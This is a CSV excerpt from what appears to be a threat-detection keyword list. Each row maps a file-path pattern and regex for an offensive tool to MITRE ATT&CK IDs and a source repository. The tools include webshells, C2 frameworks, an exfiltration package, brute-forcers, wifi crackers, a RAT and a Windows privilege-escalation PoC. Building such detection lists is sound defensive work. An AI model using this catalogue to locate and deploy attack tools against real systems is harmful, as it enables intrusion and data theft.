"*/weblogic-t3-info.nse*",".{0,1000}\/weblogic\-t3\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/webshell.py*",".{0,1000}\/webshell\.py.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*/webshell/*.aspx*",".{0,1000}\/webshell\/.{0,1000}\.aspx.{0,1000}","offensive_tool_keyword","cobaltstrike","Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. It can be directly used by metasploit-framework - viper- cobalt strike for session online.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/FunnyWolf/pystinger","1","1","N/A","10","10","1336","207","2021-09-29T13:13:43Z","2019-09-29T05:23:54Z" "*/webshell/*.jsp*",".{0,1000}\/webshell\/.{0,1000}\.jsp.{0,1000}","offensive_tool_keyword","cobaltstrike","Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. It can be directly used by metasploit-framework - viper- cobalt strike for session online.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/FunnyWolf/pystinger","1","1","N/A","10","10","1336","207","2021-09-29T13:13:43Z","2019-09-29T05:23:54Z" "*/webshell/*.php*",".{0,1000}\/webshell\/.{0,1000}\.php.{0,1000}","offensive_tool_keyword","cobaltstrike","Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. It can be directly used by metasploit-framework - viper- cobalt strike for session online.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/FunnyWolf/pystinger","1","1","N/A","10","10","1336","207","2021-09-29T13:13:43Z","2019-09-29T05:23:54Z" "*/webshells/shell.aspx*",".{0,1000}\/webshells\/shell\.aspx.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1075","161","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" "*/webshells/shell.php*",".{0,1000}\/webshells\/shell\.php.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1075","161","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" "*/WebSocketC2.cs*",".{0,1000}\/WebSocketC2\.cs.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","440","100","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*/Weevely*",".{0,1000}\/Weevely.{0,1000}","offensive_tool_keyword","weevely","weevely php web shell","T1110","TA0006","N/A","N/A","Web Attacks","https://github.com/sunge/Weevely","1","0","N/A","N/A","1","47","111","2012-04-19T18:00:08Z","2012-05-04T13:17:42Z" "*/Weevely3*",".{0,1000}\/Weevely3.{0,1000}","offensive_tool_keyword","Weevely3","Webponized web shell","T1100 - T1102 - T1059 - T1071 - T1056","TA0002 - TA0003","N/A","N/A","Web Attacks","https://github.com/epinna/weevely3","1","0","N/A","N/A","10","3071","596","2024-04-29T15:21:59Z","2014-09-20T10:16:49Z" "*/well_known_sids.py*",".{0,1000}\/well_known_sids\.py.{0,1000}","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.","T1595 T1590 T1591","TA0001 - TA0002 - TA0007 - TA0008 - TA0011","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","1","N/A","N/A","6","546","89","2024-03-21T15:22:56Z","2019-03-27T18:36:41Z" "*/WerTrigger.git*",".{0,1000}\/WerTrigger\.git.{0,1000}","offensive_tool_keyword","WerTrigger","Weaponizing for privileged file writes bugs with windows problem reporting","T1059.003 - T1055.001 - T1127.001 - T1546.008","TA0002 - TA0004 ","N/A","N/A","Privilege Escalation","https://github.com/sailay1996/WerTrigger","1","1","N/A","9","2","172","34","2022-05-10T17:36:49Z","2020-05-20T11:27:56Z" "*/WfpTokenDup.exe*",".{0,1000}\/WfpTokenDup\.exe.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","7","673","104","2024-04-23T03:05:39Z","2021-12-28T13:14:25Z" "*/whatlicense.git*",".{0,1000}\/whatlicense\.git.{0,1000}","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/charlesnathansmith/whatlicense","1","1","N/A","6","1","72","6","2024-04-09T05:30:56Z","2023-07-10T11:57:44Z" "*/WheresMyImplant/*",".{0,1000}\/WheresMyImplant\/.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*/Whisker.exe*",".{0,1000}\/Whisker\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/whoami.py*",".{0,1000}\/whoami\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/WhoAmI.task*",".{0,1000}\/WhoAmI\.task.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*/whois-domain.nse*",".{0,1000}\/whois\-domain\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/whois-ip.nse*",".{0,1000}\/whois\-ip\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Widgets/LootWidget.*",".{0,1000}\/Widgets\/LootWidget\..{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*/wifi_hopping.*",".{0,1000}\/wifi_hopping\..{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "*/WiFiBroot*",".{0,1000}\/WiFiBroot.{0,1000}","offensive_tool_keyword","wifibroot","A Wireless (WPA/WPA2) Pentest/Cracking tool. Captures & Crack 4-way handshake and PMKID key. Also. supports a deauthentication/jammer mode for stress testing","T1018 - T1040 - T1095 - T1113 - T1210 - T1437 - T1499 - T1557 - T1562 - T1573","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Network Exploitation tools","https://github.com/hash3liZer/WiFiBroot","1","1","N/A","N/A","10","923","178","2021-01-15T09:07:36Z","2018-07-30T10:57:22Z" "*/wifidump.c*",".{0,1000}\/wifidump\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rvrsh3ll/BOF_Collection","1","1","N/A","10","10","517","52","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z" "*/WifiKeys.dll*",".{0,1000}\/WifiKeys\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*/wifiPayload/client.py*",".{0,1000}\/wifiPayload\/client\.py.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","1","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*/wifiPayload/server.py*",".{0,1000}\/wifiPayload\/server\.py.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","1","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*/wifite -c *",".{0,1000}\/wifite\s\-c\s.{0,1000}","offensive_tool_keyword","wifite2","This repo is a complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets. and Wifite will automatically start trying to capture or crack the password.","T1590 - T1170 - T1595","TA0002 - TA0003 - TA0007","N/A","N/A","Network Exploitation tools","https://github.com/derv82/wifite2","1","0","N/A","N/A","10","5989","1241","2024-04-27T01:14:44Z","2015-05-30T06:09:52Z" "*/wifite2*",".{0,1000}\/wifite2.{0,1000}","offensive_tool_keyword","wifite2","This repo is a complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets. and Wifite will automatically start trying to capture or crack the password.","T1590 - T1170 - T1595","TA0002 - TA0003 - TA0007","N/A","N/A","Network Exploitation tools","https://github.com/derv82/wifite2","1","1","N/A","N/A","10","5989","1241","2024-04-27T01:14:44Z","2015-05-30T06:09:52Z" "*/wikipedia_fr.7z*",".{0,1000}\/wikipedia_fr\.7z.{0,1000}","offensive_tool_keyword","wordlists","Various wordlists FR & EN - Cracking French passwords","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/clem9669/wordlists","1","1","N/A","N/A","3","227","46","2024-05-01T14:27:57Z","2020-10-21T14:37:53Z" "*/wikiZ/RedGuard*",".{0,1000}\/wikiZ\/RedGuard.{0,1000}","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","10","10","1223","180","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" "*/win/Tor/tor.exe*",".{0,1000}\/win\/Tor\/tor\.exe.{0,1000}","offensive_tool_keyword","Tor","Tor is a python based module for using tor proxy/network services on windows - osx - linux with just one click.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Defense Evasion - Data Exfiltration","https://github.com/r0oth3x49/Tor","1","1","N/A","N/A","2","147","39","2018-04-21T10:55:00Z","2016-09-22T11:22:33Z" "*/Win7ElevateDll*",".{0,1000}\/Win7ElevateDll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/WinBruteLogon*",".{0,1000}\/WinBruteLogon.{0,1000}","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","1","N/A","N/A","10","1060","181","2023-11-09T10:37:58Z","2020-05-14T21:46:50Z" "*/win-brute-logon*",".{0,1000}\/win\-brute\-logon.{0,1000}","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","1","N/A","N/A","10","1060","181","2023-11-09T10:37:58Z","2020-05-14T21:46:50Z" "*/WinBruteLogon.zip*",".{0,1000}\/WinBruteLogon\.zip.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*/windapsearch.git*",".{0,1000}\/windapsearch\.git.{0,1000}","offensive_tool_keyword","windapsearch","Python script to enumerate users - groups and computers from a Windows domain through LDAP queries","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/ropnop/windapsearch","1","1","AD Enumeration","7","8","726","142","2022-04-20T07:40:42Z","2016-08-10T21:43:30Z" "*/windapsearch.py*",".{0,1000}\/windapsearch\.py.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","1","N/A","7","2","146","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" "*/windapsearch_*.txt*",".{0,1000}\/windapsearch_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*/WindDef_WebInstall.hta*",".{0,1000}\/WindDef_WebInstall\.hta.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*/windows/dcerpc*",".{0,1000}\/windows\/dcerpc.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/windows_autologin.rb*",".{0,1000}\/windows_autologin\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/Windows_MSKSSRV_LPE_CVE-2023-36802.git*",".{0,1000}\/Windows_MSKSSRV_LPE_CVE\-2023\-36802\.git.{0,1000}","offensive_tool_keyword","Windows_MSKSSRV_LPE_CVE-2023-36802","Complete exploit works on vulnerable Windows 11 22H2 systems CVE-2023-36802 Local Privilege Escalation POC","T1068 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/chompie1337/Windows_MSKSSRV_LPE_CVE-2023-36802","1","1","N/A","10","2","147","39","2023-10-10T17:44:17Z","2023-10-09T17:32:15Z" "*/windows_x64_admin.exe*",".{0,1000}\/windows_x64_admin\.exe.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","10","10","2419","382","2024-04-11T05:50:18Z","2019-11-15T03:25:50Z" "*/windows_x64_agent.exe*",".{0,1000}\/windows_x64_agent\.exe.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","10","10","2419","382","2024-04-11T05:50:18Z","2019-11-15T03:25:50Z" "*/windows_x86_admin.exe*",".{0,1000}\/windows_x86_admin\.exe.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","10","10","2419","382","2024-04-11T05:50:18Z","2019-11-15T03:25:50Z" "*/windows_x86_agent.exe*",".{0,1000}\/windows_x86_agent\.exe.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","10","10","2419","382","2024-04-11T05:50:18Z","2019-11-15T03:25:50Z" "*/windows-login-phish*",".{0,1000}\/windows\-login\-phish.{0,1000}","offensive_tool_keyword","windows-login-phish","Windows Login Phishing page This is a windows maching login page designed using HTML CSS and JS. This can be used for red teaming or cybersecurity awareness related purposes","T1566","N/A","N/A","N/A","Phishing","https://github.com/CipherKill/windows-login-phish","1","1","N/A","N/A","1","18","6","2022-03-25T05:49:01Z","2022-03-13T20:02:15Z" "*/windows-lpe-template*",".{0,1000}\/windows\-lpe\-template.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" 